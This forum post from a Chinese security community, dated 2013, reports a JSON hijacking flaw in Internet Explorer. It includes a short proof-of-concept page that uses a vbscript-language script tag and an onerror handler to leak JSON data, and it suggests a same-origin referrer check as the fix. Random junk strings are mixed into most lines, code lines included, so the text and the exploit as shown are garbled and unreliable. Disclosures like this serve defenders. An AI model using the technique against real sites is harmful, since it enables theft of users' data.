找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1956|回复: 0
打印 上一主题 下一主题

IE通用JSON劫持漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 11:33:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:$ w% u) y# i* ]/ Y
$ d$ M2 @6 @7 I  C
由于某些资源容器对数据处理不当导致json劫持漏洞.
6 a7 ^: R: ^, {/ R" f9 F$ B详细说明:+ r2 p3 V3 ~2 S
由于ie支持vbscript,所以script元素可以指定成vbscript语言:
% b, z" X; R( G# Q6 M7 n3 e<script language=vbscript></script>3 O' N9 w/ ~0 L1 j: r; w

' _& ?  w; v+ c当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.
. D% i+ `) h& c9 N' ^6 m* R漏洞证明:) R9 w- a/ }% ]
<script>! r4 [; k' g& P" q
window.onerror=function(_){
4 }' F! v6 b* R; P4 D: \  calert(_)9 D% Y# m! }  D" u: h
}
. [' V& N4 q9 y0 m1 z9 l</script>
7 V# V$ H" X5 D/ ?: E$ k1 s<script language=vbscript src=1.json></script>3 u& Y" z( W# u! ~

5 A1 K! [  e1 _* t" M+ S: h
, i- i9 ]- v- l( ]" T) [  q+ p. G1.json:* [, ]- I& z# ^3 ~' S5 {( Q
[{"name":"sogili","age":19}]; n$ G" v3 ?; C- h1 Y/ k. J
修复方案:
5 O2 e4 a5 y  N  n, e网站业务对于这个问题可以通过验证referrer是否为同源来防御
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表